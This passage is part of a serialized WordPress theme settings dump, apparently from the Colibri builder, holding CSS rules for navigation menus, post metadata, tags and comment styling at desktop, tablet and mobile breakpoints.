a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n  height: 0px;\n  width: 100% ;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li > ul {\n  margin-top: 0px;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-42 \n      ul.colibri-menu.solid-active-item > li::before {\n  background-color: white;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0%;\n  border-top-right-radius: 0%;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0%;\n  border-bottom-right-radius: 0%;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-42 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: rgb(81, 105, 207);\n  background-image: none;\n  height: 3px;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  font-size: 14px;\n  color: rgb(60, 65, 84);\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover  > a {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover > a,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover  > a {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: rgb(255, 255, 255);\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n  background-color: rgb(255, 255, 255);\n  background-image: none;\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #303e7a;\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #303e7a;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n  background-color: #303e7a;\n  background-image: none;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul {\n  background-color: #ffffff;\n  background-image: none;\n  margin-right: 5px;\n  margin-left: 5px;\n  box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.04) ;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1.5em;\n  letter-spacing: 0px;\n  color: #f6f8fa;\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: rgb(81, 105, 207);\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: rgb(81, 105, 207);\n}\n#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1.5em;\n  letter-spacing: 0px;\n  color: rgb(81, 105, 207);\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li {\n  margin-top: 0px;\n  margin-right: 20px;\n  margin-bottom: 0px;\n  margin-left: 20px;\n  padding-top: 10px;\n  padding-right: 0px;\n  padding-bottom: 10px;\n  padding-left: 0px;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n  margin-top: 0px;\n  margin-right: 20px;\n  margin-bottom: 0px;\n  margin-left: 20px;\n  padding-top: 10px;\n  padding-right: 0px;\n  padding-bottom: 10px;\n  padding-left: 0px;\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu {\n  justify-content: flex-end;\n}\n#colibri .h-navigation_sticky .style-42 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky .style-42 \n      ul.colibri-menu.bordered-active-item > li::before,#colibri .h-navigation_sticky.style-42 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky.style-42 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: #303e7a;\n  background-image: none;\n}\n#colibri .h-navigation_sticky .style-42 >  div > .colibri-menu-container > ul.colibri-menu > li > a,#colibri .h-navigation_sticky.style-42 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  color: rgb(7, 29, 122);\n}\n#colibri .h-navigation_sticky .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a,#colibri .h-navigation_sticky.style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #303e7a;\n}\n#colibri .h-navigation_sticky .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a,#colibri .h-navigation_sticky.style-42  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky.style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #303e7a;\n}\n#colibri .h-navigation_sticky .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky .style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover,#colibri .h-navigation_sticky.style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky.style-42  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  color: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:43;a:3:{s:7:\"desktop\";s:928:\"#colibri .style-43-offscreen {\n  background-color: #222B34;\n  background-image: none;\n  width: 300px !important;\n}\n#colibri .style-43-offscreenOverlay {\n  background-color: rgba(0,0,0,0.5);\n  background-image: none;\n}\n#colibri .style-43  .h-hamburger-icon {\n  background-color: rgba(0, 0, 0, 0.1);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: black;\n  border-top-style: solid;\n  border-top-left-radius: 100%;\n  border-top-right-radius: 100%;\n  border-right-width: 0px;\n  border-right-color: black;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: black;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 100%;\n  border-bottom-right-radius: 100%;\n  border-left-width: 0px;\n  border-left-color: black;\n  border-left-style: solid;\n  fill: white;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n  width: 24px;\n  height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:44;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:45;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:46;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-46 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:47;a:3:{s:7:\"desktop\";s:496:\"#colibri .style-47-image {\n  max-height: 70px;\n}\n#colibri .style-47 a,#colibri .style-47  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-47-image,#colibri .h-navigation_sticky.style-47-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-47 a,#colibri .h-navigation_sticky .style-47  .logo-text,#colibri .h-navigation_sticky.style-47 a,#colibri .h-navigation_sticky.style-47  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:48;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:49;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-49 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:50;a:3:{s:7:\"desktop\";s:3929:\"#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-50  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n#colibri .style-50 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n#colibri .style-50  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-50  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:51;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:52;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:53;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:54;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:55;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:56;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:57;a:3:{s:7:\"desktop\";s:485:\"#colibri .style-57 {\n  height: auto;\n  min-height: unset;\n  color: #f6f8fa;\n  background-color: #303e7a;\n  background-image: none;\n  padding-top: 10px;\n  padding-bottom: 50px;\n}\n#colibri .style-57 h1 {\n  color: #f6f8fa;\n}\n#colibri .style-57 h2 {\n  color: #f6f8fa;\n}\n#colibri .style-57 h3 {\n  color: #f6f8fa;\n}\n#colibri .style-57 h4 {\n  color: #f6f8fa;\n}\n#colibri .style-57 h5 {\n  color: #f6f8fa;\n}\n#colibri .style-57 h6 {\n  color: #f6f8fa;\n}\n#colibri .style-57 p {\n  color: #f6f8fa;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:58;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:59;a:3:{s:7:\"desktop\";s:166:\"#colibri .style-59-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n#colibri .style-59 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:60;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:61;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:62;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-62 {\n  height: auto;\n  min-height: unset;\n  padding-top: 30px;\n  padding-bottom: 30px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:63;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:64;a:3:{s:7:\"desktop\";s:156:\".style-64 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 0px;\n}\n#colibri .style-64 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:65;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:66;a:3:{s:7:\"desktop\";s:482:\"#colibri .style-66 {\n  background-color: #FFFFFF;\n  background-image: none;\n  box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:109:\"#colibri .style-66 {\n  margin-top: 10px;\n  margin-right: 10px;\n  margin-bottom: 10px;\n  margin-left: 10px;\n}\n\";}i:67;a:3:{s:7:\"desktop\";s:103:\"#colibri .style-67 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:68;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:69;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:70;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:71;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:72;a:3:{s:7:\"desktop\";s:76:\"#colibri .style-72 {\n  background-color: unset;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:73;a:3:{s:7:\"desktop\";s:209:\".style-73 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 0px;\n}\n#colibri .style-73 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-color: unset;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:74;a:3:{s:7:\"desktop\";s:245:\"#colibri .style-74 {\n  background-color: rgba(255,255,255,0);\n  background-image: none;\n  text-align: center;\n}\n#colibri .style-74 .colibri-post-thumbnail-shortcode img {\n  height: 300px;\n  object-position: center center;\n  object-fit: cover;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:75;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:76;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-76 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:77;a:3:{s:7:\"desktop\";s:630:\"#colibri .style-77 svg {\n  width: 18px ;\n  height: 18px;\n  display: none;\n  margin-right: 5px;\n}\n#colibri .style-77 .metadata-suffix {\n  font-size: 14px;\n}\n#colibri .style-77 .metadata-suffix:hover {\n  color: rgb(70, 112, 127);\n}\n#colibri .style-77 .metadata-suffix:hover {\n  color: rgb(70, 112, 127);\n}\n#colibri .style-77 .metadata-prefix {\n  font-size: 14px;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-77 a {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(70, 112, 127);\n}\n#colibri .style-77 a:hover {\n  color: #17252a;\n}\n#colibri .style-77 a:hover {\n  color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:78;a:3:{s:7:\"desktop\";s:166:\"#colibri .style-78 .colibri-post-content {\n  margin-bottom: 0px;\n  color: rgb(23, 37, 42);\n}\n#colibri .style-78 .colibri-post-content p {\n  color: rgb(37, 41, 42);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:79;a:3:{s:7:\"desktop\";s:45:\"#colibri .style-79 {\n  margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:80;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-80 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:81;a:3:{s:7:\"desktop\";s:304:\"#colibri .style-81 {\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(37, 41, 42);\n  margin-right: 5px;\n}\n#colibri .style-81 p {\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-81 ul {\n  list-style-type: disc;\n}\n#colibri .style-81 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:82;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-82 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:83;a:3:{s:7:\"desktop\";s:462:\"#colibri .style-83 .categories-prefix {\n  margin-right: 16px;\n}\n#colibri .style-83 a,#colibri .style-83  .colibri-post-category {\n  margin-right: 5px;\n  margin-left: 5px;\n  text-decoration: none;\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(153, 153, 153);\n}\n#colibri .style-83 a:hover,#colibri .style-83  .colibri-post-category:hover {\n  color: #17252a;\n}\n#colibri .style-83 a:hover,#colibri .style-83  .colibri-post-category:hover {\n  color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:84;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:85;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-85 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:86;a:3:{s:7:\"desktop\";s:344:\"#colibri .style-86 {\n  font-weight: 400;\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(37, 41, 42);\n  margin-right: 5px;\n}\n#colibri .style-86 p {\n  font-weight: 400;\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-86 ul {\n  list-style-type: disc;\n}\n#colibri .style-86 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:87;a:3:{s:7:\"desktop\";s:155:\".style-87 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 23px;\n}\n#colibri .style-87 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:88;a:3:{s:7:\"desktop\";s:487:\"#colibri .style-88 .tags-prefix {\n  margin-right: 5px;\n  font-size: 14px;\n  color: rgb(70, 112, 127);\n}\n#colibri .style-88 a,#colibri .style-88  .colibri-post-tag {\n  margin-right: 5px;\n  margin-left: 5px;\n  text-decoration: none;\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(153, 153, 153);\n}\n#colibri .style-88 a:hover,#colibri .style-88  .colibri-post-tag:hover {\n  color: #17252a;\n}\n#colibri .style-88 a:hover,#colibri .style-88  .colibri-post-tag:hover {\n  color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:89;a:3:{s:7:\"desktop\";s:452:\"#colibri .style-89 {\n  margin-right: 30px;\n  margin-left: 30px;\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:66:\"#colibri .style-89 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";s:6:\"mobile\";s:66:\"#colibri .style-89 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:90;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-90 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:91;a:3:{s:7:\"desktop\";s:758:\"#colibri .style-91 .post-title {\n  max-width: 40ch;\n}\n#colibri .style-91 .nav-previous a,#colibri .style-91 .nav-next a {\n  text-decoration: none;\n  color: rgb(23, 37, 42);\n  border-top-width: 2px;\n  border-top-color: black;\n  border-top-style: none;\n  border-right-width: 2px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-left-width: 2px;\n  border-left-color: black;\n  border-left-style: none;\n  background-color: unset;\n  background-image: none;\n}\n#colibri .style-91 .nav-previous a:hover,#colibri .style-91 .nav-next a:hover {\n  color: #03a9f4;\n}\n#colibri .style-91 .nav-previous a:hover,#colibri .style-91 .nav-next a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:92;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-92 {\n  text-align: right;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:93;a:3:{s:7:\"desktop\";s:651:\"#colibri .style-93 .nav-previous a,#colibri .style-93 .nav-next a {\n  text-decoration: none;\n  color: rgb(23, 37, 42);\n  border-top-width: 2px;\n  border-top-color: black;\n  border-top-style: none;\n  border-right-width: 2px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-left-width: 2px;\n  border-left-color: black;\n  border-left-style: none;\n}\n#colibri .style-93 .nav-previous a:hover,#colibri .style-93 .nav-next a:hover {\n  color: #03a9f4;\n}\n#colibri .style-93 .nav-previous a:hover,#colibri .style-93 .nav-next a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:94;a:3:{s:7:\"desktop\";s:103:\"#colibri .style-94 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:95;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:96;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:97;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:98;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:99;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:100;a:3:{s:7:\"desktop\";s:125:\"#colibri .style-100 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 15px;\n}\n\";s:6:\"tablet\";s:47:\"#colibri .style-100 {\n  padding-bottom: 5px;\n}\n\";s:6:\"mobile\";s:47:\"#colibri .style-100 {\n  padding-bottom: 5px;\n}\n\";}i:101;a:3:{s:7:\"desktop\";s:3577:\"#colibri .style-101 .comments-disabled {\n  text-align: center;\n  margin-bottom: 0px;\n  text-decoration: none;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-101 .children {\n  margin-left: 12px;\n}\n#colibri .style-101 .comment-body .reply a {\n  margin-bottom: 10px;\n  font-weight: 400;\n  text-transform: lowercase;\n  font-size: 1em;\n  line-height: 1.5;\n  color: #03a9f4;\n}\n#colibri .style-101 .comment-body .reply a:hover {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-101 .comment-body .reply a:hover {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-101 .comment-content {\n  text-decoration: none;\n  font-size: 16px;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-101 .comment-content p {\n  color: rgb(37, 41, 42);\n}\n#colibri .style-101 .comment-content a:hover {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-101 .comment-metadata {\n  